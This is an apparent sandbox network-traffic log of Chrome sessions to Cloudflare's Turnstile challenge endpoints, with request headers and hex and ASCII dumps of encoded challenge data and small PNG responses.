                                                                                                        31192.168.2.1749762104.18.94.414431864C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-09 16:18:38 UTC782OUTGET /cdn-cgi/challenge-platform/h/g/i/8ff5be739bf042ad/1736439515900/ET6ut0jnLrQZaS9 HTTP/1.1
                                                                                                        Host: challenges.cloudflare.com
                                                                                                        Connection: keep-alive
                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                        Sec-Fetch-Dest: image
                                                                                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/ttb53/0x4AAAAAAA4xOIvlPDLMxVgd/auto/fbE/normal/auto/
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        2025-01-09 16:18:39 UTC200INHTTP/1.1 200 OK
                                                                                                        Date: Thu, 09 Jan 2025 16:18:38 GMT
                                                                                                        Content-Type: image/png
                                                                                                        Content-Length: 61
                                                                                                        Connection: close
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8ff5be916a73efa7-EWR
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        2025-01-09 16:18:39 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 5a 00 00 00 4d 08 02 00 00 00 a9 19 e4 76 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                        Data Ascii: PNGIHDRZMvIDAT$IENDB`


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        32192.168.2.1749763104.18.95.414431864C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-09 16:18:39 UTC428OUTGET /cdn-cgi/challenge-platform/h/g/i/8ff5be739bf042ad/1736439515900/ET6ut0jnLrQZaS9 HTTP/1.1
                                                                                                        Host: challenges.cloudflare.com
                                                                                                        Connection: keep-alive
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        Accept: */*
                                                                                                        Sec-Fetch-Site: none
                                                                                                        Sec-Fetch-Mode: cors
                                                                                                        Sec-Fetch-Dest: empty
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        2025-01-09 16:18:39 UTC200INHTTP/1.1 200 OK
                                                                                                        Date: Thu, 09 Jan 2025 16:18:39 GMT
                                                                                                        Content-Type: image/png
                                                                                                        Content-Length: 61
                                                                                                        Connection: close
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8ff5be956a9c7c9f-EWR
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        2025-01-09 16:18:39 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 5a 00 00 00 4d 08 02 00 00 00 a9 19 e4 76 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                        Data Ascii: PNGIHDRZMvIDAT$IENDB`


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        33192.168.2.1749764104.18.94.414431864C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-09 16:18:39 UTC1172OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/1140754575:1736436948:s57gMlu_d0GxrTPQdU_anznfPjLlEvsNKPsJD4qDoJc/8ff5be739bf042ad/vcG88keSW_X_91JV8E94BgxdsCtRYkoi0_UQuEtzmG0-1736439514-1.1.1.1-OFazbJ.OkiYW18PfYWhb0pzWwCU00_eRO3Ec6aHBp4nAU8cAXTKlmRFTp5m1r_Vr HTTP/1.1
                                                                                                        Host: challenges.cloudflare.com
                                                                                                        Connection: keep-alive
                                                                                                        Content-Length: 32543
                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                        Content-type: application/x-www-form-urlencoded
                                                                                                        CF-Chl-RetryAttempt: 0
                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        CF-Challenge: vcG88keSW_X_91JV8E94BgxdsCtRYkoi0_UQuEtzmG0-1736439514-1.1.1.1-OFazbJ.OkiYW18PfYWhb0pzWwCU00_eRO3Ec6aHBp4nAU8cAXTKlmRFTp5m1r_Vr
                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                        Accept: */*
                                                                                                        Origin: https://challenges.cloudflare.com
                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                        Sec-Fetch-Mode: cors
                                                                                                        Sec-Fetch-Dest: empty
                                                                                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/ttb53/0x4AAAAAAA4xOIvlPDLMxVgd/auto/fbE/normal/auto/
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        2025-01-09 16:18:39 UTC16384OUTData Raw: 76 5f 38 66 66 35 62 65 37 33 39 62 66 30 34 32 61 64 3d 79 62 77 75 69 54 73 76 57 54 57 78 77 78 4f 73 35 53 77 75 53 77 58 4f 78 51 44 4e 44 6f 75 42 71 38 78 54 44 4d 69 44 7a 43 44 4a 44 48 75 73 24 46 61 44 68 44 32 75 31 67 6a 75 44 30 77 4c 74 44 59 34 54 42 44 38 5a 34 75 44 2d 75 53 4f 44 67 69 50 73 77 44 6c 75 58 46 44 75 75 44 43 57 77 4b 59 75 54 24 68 44 4e 77 73 6f 44 58 50 34 65 44 48 25 32 62 42 39 51 44 34 65 73 71 76 72 55 6a 75 73 70 6d 75 43 73 4a 4c 4b 65 44 62 57 57 54 62 44 68 4a 78 4f 46 56 51 6a 44 54 62 44 53 64 77 44 41 56 51 46 46 75 73 42 44 2d 38 4a 4f 66 58 74 24 66 72 51 76 63 67 72 61 66 77 71 70 4f 41 58 67 4f 65 44 58 64 77 44 78 4d 63 6a 46 56 46 58 54 44 75 71 46 61 6c 39 74 6c 46 48 44 74 35 5a 45 48 77 45 67 63 49
                                                                                                        Data Ascii: v_8ff5be739bf042ad=ybwuiTsvWTWxwxOs5SwuSwXOxQDNDouBq8xTDMiDzCDJDHus$FaDhD2u1gjuD0wLtDY4TBD8Z4uD-uSODgiPswDluXFDuuDCWwKYuT$hDNwsoDXP4eDH%2bB9QD4esqvrUjuspmuCsJLKeDbWWTbDhJxOFVQjDTbDSdwDAVQFFusBD-8JOfXt$frQvcgrafwqpOAXgOeDXdwDxMcjFVFXTDuqFal9tlFHDt5ZEHwEgcI
                                                                                                        2025-01-09 16:18:39 UTC16159OUTData Raw: 47 41 37 44 64 66 6f 77 43 36 54 32 79 75 78 4c 73 7a 73 57 75 70 75 78 38 44 44 53 39 50 58 37 65 73 77 44 68 75 53 65 53 44 73 31 43 63 34 44 44 2b 4e 61 53 72 54 61 73 47 47 34 44 74 44 73 2b 77 6c 44 38 34 44 46 44 31 34 73 78 45 6a 44 54 34 7a 65 44 2b 44 48 65 58 57 44 2b 44 42 62 44 36 53 24 44 51 57 53 57 44 4c 46 6d 34 38 62 73 4a 63 34 34 53 38 73 50 44 63 34 44 42 75 41 44 79 34 73 76 73 6b 44 6d 75 78 30 73 78 44 46 65 54 75 73 49 44 66 53 34 76 44 2d 44 53 65 53 43 78 63 44 48 75 53 57 44 61 65 44 54 73 44 44 76 24 24 6c 78 4c 44 75 75 4f 44 44 50 73 73 44 4c 73 73 38 54 50 44 57 34 4f 61 78 43 47 51 54 73 61 78 56 44 30 34 4e 38 78 2b 44 30 34 42 6f 65 4b 75 73 4b 71 4f 44 59 77 34 36 58 6c 61 32 34 6d 56 44 44 44 4c 6d 55 53 30 54 6d 64 31
                                                                                                        Data Ascii: GA7DdfowC6T2yuxLszsWupux8DDS9PX7eswDhuSeSDs1Cc4DD+NaSrTasGG4DtDs+wlD84DFD14sxEjDT4zeD+DHeXWD+DBbD6S$DQWSWDLFm48bsJc44S8sPDc4DBuADy4svskDmux0sxDFeTusIDfS4vD-DSeSCxcDHuSWDaeDTsDDv$$lxLDuuODDPssDLss8TPDW4OaxCGQTsaxVD04N8x+D04BoeKusKqODYw46Xla24mVDDDLmUS0Tmd1
                                                                                                        2025-01-09 16:18:39 UTC318INHTTP/1.1 200 OK
                                                                                                        Date: Thu, 09 Jan 2025 16:18:39 GMT
                                                                                                        Content-Type: text/plain; charset=UTF-8
                                                                                                        Content-Length: 26348
                                                                                                        Connection: close
                                                                                                        cf-chl-gen: qDi7w70oZOiTy51uQUWEyjIFhA/PmzlFgv23OsXW7R8iI8xv/itwYGqi7lLF7EgmwTo=$pvtsFVkCx2vHdTI/
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8ff5be95bb9c0f6c-EWR
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        2025-01-09 16:18:39 UTC1051INData Raw: 6b 71 65 63 67 73 6d 6c 72 71 65 62 30 4b 36 70 6e 64 4b 73 78 38 50 48 30 38 57 56 73 72 33 4a 6d 62 61 35 75 70 36 35 35 37 72 6e 36 72 61 6b 70 72 37 4c 37 38 76 4f 78 38 50 4e 39 72 50 77 37 39 65 31 78 50 32 39 32 64 66 39 2f 4f 76 5a 76 4f 37 46 77 2f 6e 56 34 67 6e 4a 7a 63 77 44 7a 39 6e 70 45 65 55 49 46 77 6b 47 31 4f 67 4a 31 52 4c 71 45 4e 37 78 41 43 45 42 33 50 76 67 45 76 48 34 36 52 63 50 37 41 38 42 2b 51 4d 6e 42 6a 63 71 45 2f 55 53 4c 42 67 31 48 44 62 32 49 68 34 67 51 69 34 56 49 45 51 71 47 43 6b 6e 46 69 4d 33 4f 6a 6b 4c 54 67 30 75 4d 46 45 53 4e 55 49 31 54 30 74 59 57 53 77 35 4f 47 45 78 4e 55 39 65 47 6c 4e 71 5a 56 6b 72 5a 45 52 45 54 69 70 4d 54 56 46 70 59 6d 56 58 4d 6e 4a 45 65 56 64 72 65 56 30 38 5a 47 56 6b 5a 33 4e
                                                                                                        Data Ascii: kqecgsmlrqeb0K6pndKsx8PH08WVsr3Jmba5up6557rn6rakpr7L78vOx8PN9rPw79e1xP292df9/OvZvO7Fw/nV4gnJzcwDz9npEeUIFwkG1OgJ1RLqEN7xACEB3PvgEvH46RcP7A8B+QMnBjcqE/USLBg1HDb2Ih4gQi4VIEQqGCknFiM3OjkLTg0uMFESNUI1T0tYWSw5OGExNU9eGlNqZVkrZERETipMTVFpYmVXMnJEeVdreV08ZGVkZ3N
                                                                                                        2025-01-09 16:18:39 UTC1369INData Raw: 53 73 4a 71 73 31 39 37 42 32 36 62 48 78 73 54 48 79 62 62 4d 77 75 6d 77 34 4e 7a 31 31 4b 6a 66 30 73 48 61 37 72 75 7a 38 73 2f 65 76 64 72 69 42 74 54 5a 31 2f 44 61 44 50 66 38 2b 4e 6b 45 7a 51 2f 63 30 77 4d 46 41 52 44 70 39 67 34 53 45 78 7a 2b 49 52 72 67 33 64 37 34 38 2f 4d 45 2b 50 54 6e 2b 43 30 43 48 66 73 51 2b 53 67 67 38 43 6a 32 4f 53 58 77 2b 44 77 74 48 44 55 41 41 54 63 31 51 44 63 51 45 52 41 30 46 54 68 47 53 44 59 6e 52 69 63 49 4a 6c 45 56 4b 6a 59 71 56 53 70 4f 4b 68 64 4b 58 6b 31 51 49 47 42 52 4a 43 38 79 49 53 63 68 4a 6b 46 6b 4a 45 34 76 59 6a 74 73 62 56 46 6c 51 48 6b 32 56 6d 55 33 53 46 6b 33 63 31 6c 6a 64 47 4d 37 51 32 46 7a 69 6b 70 32 68 45 61 4e 5a 48 39 4f 65 70 42 4b 67 30 31 72 56 59 4b 5a 6d 35 42 37 6e 4a
                                                                                                        Data Ascii: SsJqs197B26bHxsTHybbMwumw4Nz11Kjf0sHa7ruz8s/evdriBtTZ1/DaDPf8+NkEzQ/c0wMFARDp9g4SExz+IRrg3d748/ME+PTn+C0CHfsQ+Sgg8Cj2OSXw+DwtHDUAATc1QDcQERA0FThGSDYnRicIJlEVKjYqVSpOKhdKXk1QIGBRJC8yISchJkFkJE4vYjtsbVFlQHk2VmU3SFk3c1ljdGM7Q2Fzikp2hEaNZH9OepBKg01rVYKZm5B7nJ
                                                                                                        2025-01-09 16:18:39 UTC1369INData Raw: 75 61 2f 68 70 4e 4b 31 70 73 54 63 33 74 6e 6d 30 73 37 47 78 4f 48 31 30 4f 36 30 72 64 62 30 32 4f 7a 32 7a 39 58 7a 2b 72 66 30 39 2b 66 43 36 75 76 64 44 41 76 58 44 39 45 53 45 65 2f 79 7a 77 6f 52 7a 2b 54 32 47 68 6f 50 32 68 45 67 31 50 76 75 34 74 77 47 35 2b 62 37 35 79 34 48 39 69 45 42 4b 68 45 6a 49 79 67 79 4e 2f 51 6f 4c 66 76 33 45 77 34 61 44 66 30 51 44 7a 55 2f 47 6a 56 4a 47 55 73 38 42 55 6b 74 4c 69 34 6a 44 7a 49 68 48 6c 51 69 43 7a 52 48 4d 56 6b 38 52 7a 70 69 49 53 4a 42 51 42 30 5a 52 31 6f 71 53 6d 4d 2b 4e 32 6c 46 54 55 68 4c 4d 57 59 2b 5a 45 64 36 63 47 68 4d 63 6c 74 49 64 56 52 2f 58 31 68 75 52 6b 46 6d 67 46 4e 58 66 6e 39 4f 69 33 47 52 63 6b 74 70 6a 6d 70 55 64 70 42 6e 55 6d 74 71 6d 35 46 74 6f 4b 4e 33 64 35 4a
                                                                                                        Data Ascii: ua/hpNK1psTc3tnm0s7GxOH10O60rdb02Oz2z9Xz+rf09+fC6uvdDAvXD9ESEe/yzwoRz+T2GhoP2hEg1Pvu4twG5+b75y4H9iEBKhEjIygyN/QoLfv3Ew4aDf0QDzU/GjVJGUs8BUktLi4jDzIhHlQiCzRHMVk8RzpiISJBQB0ZR1oqSmM+N2lFTUhLMWY+ZEd6cGhMcltIdVR/X1huRkFmgFNXfn9Oi3GRcktpjmpUdpBnUmtqm5FtoKN3d5J
                                                                                                        2025-01-09 16:18:39 UTC1369INData Raw: 61 7a 76 72 39 72 6e 76 4b 71 71 38 4e 58 6d 74 4c 53 73 37 4f 58 71 39 39 54 79 2b 4c 6d 2b 2f 67 66 61 38 74 66 42 33 75 66 35 36 4d 30 52 35 4e 44 37 38 77 37 6e 31 42 4c 72 44 68 4d 56 44 78 33 78 46 4e 4c 39 47 2f 6b 6c 2f 53 6a 36 4b 76 48 6b 2f 52 34 70 37 68 33 72 48 41 6f 48 49 66 30 47 39 79 51 46 4f 50 63 50 4f 54 6f 2b 4f 68 34 36 41 69 49 66 2f 51 4d 78 43 54 35 45 46 30 4e 47 4d 55 6f 45 55 46 45 2f 4d 31 51 78 56 44 55 36 55 69 63 51 4d 54 41 31 4d 6b 46 54 59 6c 45 38 52 56 52 43 4e 30 74 5a 61 46 63 77 57 6d 4e 74 64 46 5a 52 54 54 52 58 61 47 70 4b 56 31 64 70 58 57 4a 7a 55 6b 46 67 58 33 39 36 56 46 79 4b 62 46 39 45 66 33 2b 48 58 4a 47 52 53 35 4a 34 6a 6e 64 33 65 31 70 6f 6d 47 79 54 66 6e 65 4e 64 6e 79 44 70 61 56 32 6d 6e 79 58
                                                                                                        Data Ascii: azvr9rnvKqq8NXmtLSs7OXq99Ty+Lm+/gfa8tfB3uf56M0R5ND78w7n1BLrDhMVDx3xFNL9G/kl/Sj6KvHk/R4p7h3rHAoHIf0G9yQFOPcPOTo+Oh46AiIf/QMxCT5EF0NGMUoEUFE/M1QxVDU6UicQMTA1MkFTYlE8RVRCN0tZaFcwWmNtdFZRTTRXaGpKV1dpXWJzUkFgX396VFyKbF9Ef3+HXJGRS5J4jnd3e1pomGyTfneNdnyDpaV2mnyX
                                                                                                        2025-01-09 16:18:39 UTC1369INData Raw: 4f 6d 72 50 62 75 36 50 66 32 33 50 50 7a 33 72 62 68 75 65 7a 74 34 63 45 48 38 38 44 46 78 76 54 72 42 51 7a 35 2b 4d 4d 4a 2f 64 2f 51 38 39 55 4b 34 75 59 51 32 42 62 6f 45 79 44 34 47 76 50 67 33 78 7a 76 46 2f 4c 7a 4a 51 76 37 4a 54 45 67 41 41 41 6e 46 69 4c 73 46 68 63 44 4b 77 73 33 37 7a 55 67 4d 42 30 73 47 77 45 44 4e 76 6b 33 4b 52 6b 55 4a 44 6b 49 52 7a 6c 43 4a 30 5a 4c 46 68 5a 4b 4f 56 49 74 53 52 6b 77 4e 6b 30 66 50 46 64 5a 4e 55 35 47 56 79 52 69 56 57 59 2f 4b 32 74 64 4c 56 34 74 62 6b 64 45 53 57 68 68 53 47 39 33 4f 31 52 61 65 31 4e 36 50 58 56 44 55 45 39 39 57 33 5a 61 67 55 74 59 67 48 35 68 52 47 47 42 6a 4a 5a 52 68 5a 47 4f 6a 70 4a 5a 55 46 61 5a 67 6f 43 68 6e 57 42 37 57 5a 39 35 6b 70 65 5a 66 58 78 39 6e 35 71 51 6f
                                                                                                        Data Ascii: OmrPbu6Pf23PPz3rbhuezt4cEH88DFxvTrBQz5+MMJ/d/Q89UK4uYQ2BboEyD4GvPg3xzvF/LzJQv7JTEgAAAnFiLsFhcDKws37zUgMB0sGwEDNvk3KRkUJDkIRzlCJ0ZLFhZKOVItSRkwNk0fPFdZNU5GVyRiVWY/K2tdLV4tbkdESWhhSG93O1Rae1N6PXVDUE99W3ZagUtYgH5hRGGBjJZRhZGOjpJZUFaZgoChnWB7WZ95kpeZfXx9n5qQo
                                                                                                        2025-01-09 16:18:39 UTC1369INData Raw: 79 74 2b 66 39 38 62 6e 74 30 50 53 2f 2f 74 41 41 77 67 62 59 30 73 66 68 77 2f 6f 49 78 67 34 4c 45 50 77 53 46 78 49 42 47 74 54 4e 32 4e 59 4b 47 67 72 33 49 43 44 69 42 65 51 6a 2f 75 49 68 4a 79 6a 34 4c 4f 34 64 4b 79 62 74 42 78 55 69 39 69 55 56 4c 7a 6f 54 4f 79 2f 2b 4b 77 30 31 2f 51 55 44 51 50 6b 48 4b 41 4e 46 4e 53 78 4c 53 55 34 2b 55 31 42 4f 4a 45 39 55 51 56 64 57 56 44 42 48 4e 78 34 58 4d 56 73 67 55 47 5a 61 49 6c 59 35 58 53 68 6e 4f 57 67 72 62 6b 45 37 4d 45 6f 73 59 33 41 33 53 48 70 31 4f 6c 78 38 65 6d 35 76 51 58 39 75 5a 49 65 43 63 59 4b 41 53 6e 56 2b 53 45 64 6e 53 4a 4a 52 6b 58 57 42 6a 34 52 55 6d 6c 68 7a 68 32 64 64 55 33 57 69 6f 6e 75 42 6c 47 4b 68 70 71 75 6d 6c 71 71 69 71 71 70 39 62 61 32 65 67 4b 71 30 73 72
                                                                                                        Data Ascii: yt+f98bnt0PS//tAAwgbY0sfhw/oIxg4LEPwSFxIBGtTN2NYKGgr3ICDiBeQj/uIhJyj4LO4dKybtBxUi9iUVLzoTOy/+Kw01/QUDQPkHKANFNSxLSU4+U1BOJE9UQVdWVDBHNx4XMVsgUGZaIlY5XShnOWgrbkE7MEosY3A3SHp1Olx8em5vQX9uZIeCcYKASnV+SEdnSJJRkXWBj4RUmlhzh2ddU3WionuBlGKhpqumlqqiqqp9ba2egKq0sr
                                                                                                        2025-01-09 16:18:39 UTC1369INData Raw: 79 37 2f 38 37 64 66 45 41 76 48 58 78 77 59 46 2b 51 38 4a 2b 51 6f 50 44 67 34 53 46 52 48 72 37 78 77 54 32 75 2f 62 48 4e 33 61 48 68 30 4f 39 79 67 68 49 76 73 67 4a 68 59 41 4b 53 6b 45 43 44 49 74 48 67 41 7a 4d 76 55 6d 4f 6a 58 35 2b 6a 6f 38 4f 66 34 2b 50 67 4d 51 51 54 38 48 47 45 56 47 49 43 52 4d 54 41 34 50 45 45 34 2b 4b 45 78 53 51 6c 5a 61 56 68 73 6f 59 46 70 4a 46 47 4e 65 58 56 4a 6c 59 6c 45 6e 4b 47 56 41 4f 48 42 73 4c 30 68 30 61 7a 4e 41 64 58 45 32 4e 33 56 31 5a 54 42 35 65 56 52 55 65 48 35 58 51 34 65 42 63 6d 43 47 68 59 61 4b 6a 34 6c 6a 66 70 47 4e 66 6d 79 59 6b 6d 74 58 6d 70 68 62 64 4a 79 58 58 6c 53 6b 6f 4a 31 59 6f 36 46 38 66 47 69 6d 61 36 61 6b 71 70 6d 79 72 36 31 7a 68 4c 57 79 69 32 79 34 73 33 70 77 76 62 70
                                                                                                        Data Ascii: y7/87dfEAvHXxwYF+Q8J+QoPDg4SFRHr7xwT2u/bHN3aHh0O9yghIvsgJhYAKSkECDItHgAzMvUmOjX5+jo8Of4+PgMQQT8HGEVGICRMTA4PEE4+KExSQlZaVhsoYFpJFGNeXVJlYlEnKGVAOHBsL0h0azNAdXE2N3V1ZTB5eVRUeH5XQ4eBcmCGhYaKj4ljfpGNfmyYkmtXmphbdJyXXlSkoJ1Yo6F8fGima6akqpmyr61zhLWyi2y4s3pwvbp
                                                                                                        2025-01-09 16:18:39 UTC1369INData Raw: 4e 6f 43 41 41 72 33 2f 63 37 48 43 51 6f 49 45 64 51 47 31 73 38 52 45 68 41 62 42 67 62 64 46 39 38 41 32 2b 4c 32 49 2f 4d 66 35 76 63 6a 34 78 72 33 4b 43 38 5a 48 6a 4d 75 42 79 38 55 39 67 73 33 43 44 50 36 44 44 34 34 4f 53 38 65 50 30 49 55 51 45 63 78 4e 78 31 42 4e 30 73 73 53 41 39 53 50 6c 51 56 4e 53 6c 4e 51 6c 70 54 56 46 56 4c 4c 46 74 62 53 6c 68 6a 58 6b 38 32 58 79 68 57 4a 47 77 2f 57 7a 39 72 62 6b 42 73 64 46 31 6a 51 33 42 78 5a 30 78 33 64 33 5a 30 67 48 70 72 56 6e 74 45 67 6b 43 46 57 33 5a 4b 68 34 70 63 69 49 39 6a 66 32 36 4d 6b 6e 39 66 55 57 78 78 65 5a 65 61 62 4a 69 64 63 34 39 72 58 58 68 39 68 61 43 68 6c 33 4e 6c 67 49 47 4e 71 36 36 41 72 4c 52 79 6f 33 39 78 6a 49 32 5a 74 4c 57 72 68 33 6d 55 6b 61 47 2f 77 70 54 41
                                                                                                        Data Ascii: NoCAAr3/c7HCQoIEdQG1s8REhAbBgbdF98A2+L2I/Mf5vcj4xr3KC8ZHjMuBy8U9gs3CDP6DD44OS8eP0IUQEcxNx1BN0ssSA9SPlQVNSlNQlpTVFVLLFtbSlhjXk82XyhWJGw/Wz9rbkBsdF1jQ3BxZ0x3d3Z0gHprVntEgkCFW3ZKh4pciI9jf26Mkn9fUWxxeZeabJidc49rXXh9haChl3NlgIGNq66ArLRyo39xjI2ZtLWrh3mUkaG/wpTA


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        34192.168.2.1749765104.18.95.414431864C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-09 16:18:40 UTC599OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/1140754575:1736436948:s57gMlu_d0GxrTPQdU_anznfPjLlEvsNKPsJD4qDoJc/8ff5be739bf042ad/vcG88keSW_X_91JV8E94BgxdsCtRYkoi0_UQuEtzmG0-1736439514-1.1.1.1-OFazbJ.OkiYW18PfYWhb0pzWwCU00_eRO3Ec6aHBp4nAU8cAXTKlmRFTp5m1r_Vr HTTP/1.1
                                                                                                        Host: challenges.cloudflare.com
                                                                                                        Connection: keep-alive
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        Accept: */*
                                                                                                        Sec-Fetch-Site: none
                                                                                                        Sec-Fetch-Mode: cors
                                                                                                        Sec-Fetch-Dest: empty
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        2025-01-09 16:18:40 UTC379INHTTP/1.1 404 Not Found
                                                                                                        Date: Thu, 09 Jan 2025 16:18:40 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 7
                                                                                                        Connection: close
                                                                                                        cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                        cf-chl-out: HL0fKcSlZJ95okXrpFKclNGs/hUTpZGVTPs=$qoBPAleVPYREfmKK
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8ff5be9b0dba18bc-EWR
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        2025-01-09 16:18:40 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                                        Data Ascii: invalid


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        35192.168.2.1749768104.18.94.414431864C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-09 16:19:03 UTC1172OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/1140754575:1736436948:s57gMlu_d0GxrTPQdU_anznfPjLlEvsNKPsJD4qDoJc/8ff5be739bf042ad/vcG88keSW_X_91JV8E94BgxdsCtRYkoi0_UQuEtzmG0-1736439514-1.1.1.1-OFazbJ.OkiYW18PfYWhb0pzWwCU00_eRO3Ec6aHBp4nAU8cAXTKlmRFTp5m1r_Vr HTTP/1.1
                                                                                                        Host: challenges.cloudflare.com
                                                                                                        Connection: keep-alive
                                                                                                        Content-Length: 34983
                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                        Content-type: application/x-www-form-urlencoded
                                                                                                        CF-Chl-RetryAttempt: 0
                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        CF-Challenge: vcG88keSW_X_91JV8E94BgxdsCtRYkoi0_UQuEtzmG0-1736439514-1.1.1.1-OFazbJ.OkiYW18PfYWhb0pzWwCU00_eRO3Ec6aHBp4nAU8cAXTKlmRFTp5m1r_Vr
                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                        Accept: */*
                                                                                                        Origin: https://challenges.cloudflare.com
                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                        Sec-Fetch-Mode: cors
                                                                                                        Sec-Fetch-Dest: empty
                                                                                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/ttb53/0x4AAAAAAA4xOIvlPDLMxVgd/auto/fbE/normal/auto/
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        2025-01-09 16:19:03 UTC16384OUTData Raw: 76 5f 38 66 66 35 62 65 37 33 39 62 66 30 34 32 61 64 3d 79 62 77 75 69 54 73 76 57 54 57 78 77 78 4f 73 35 53 77 75 53 77 58 4f 78 51 44 4e 44 6f 75 42 71 38 78 54 44 4d 69 44 7a 43 44 4a 44 48 75 73 24 46 61 44 68 44 32 75 31 67 6a 75 44 30 77 4c 74 44 59 34 54 42 44 38 5a 34 75 44 2d 75 53 4f 44 67 69 50 73 77 44 6c 75 58 46 44 75 75 44 43 57 77 4b 59 75 54 24 68 44 4e 77 73 6f 44 58 50 34 65 44 48 25 32 62 42 39 51 44 34 65 73 71 76 72 55 6a 75 73 70 6d 75 43 73 4a 4c 4b 65 44 62 57 57 54 62 44 68 4a 78 4f 46 56 51 6a 44 54 62 44 53 64 77 44 41 56 51 46 46 75 73 42 44 2d 38 4a 4f 66 58 74 24 66 72 51 76 63 67 72 61 66 77 71 70 4f 41 58 67 4f 65 44 58 64 77 44 78 4d 63 6a 46 56 46 58 54 44 75 71 46 61 6c 39 74 6c 46 48 44 74 35 5a 45 48 77 45 67 63 49
                                                                                                        Data Ascii: v_8ff5be739bf042ad=ybwuiTsvWTWxwxOs5SwuSwXOxQDNDouBq8xTDMiDzCDJDHus$FaDhD2u1gjuD0wLtDY4TBD8Z4uD-uSODgiPswDluXFDuuDCWwKYuT$hDNwsoDXP4eDH%2bB9QD4esqvrUjuspmuCsJLKeDbWWTbDhJxOFVQjDTbDSdwDAVQFFusBD-8JOfXt$frQvcgrafwqpOAXgOeDXdwDxMcjFVFXTDuqFal9tlFHDt5ZEHwEgcI
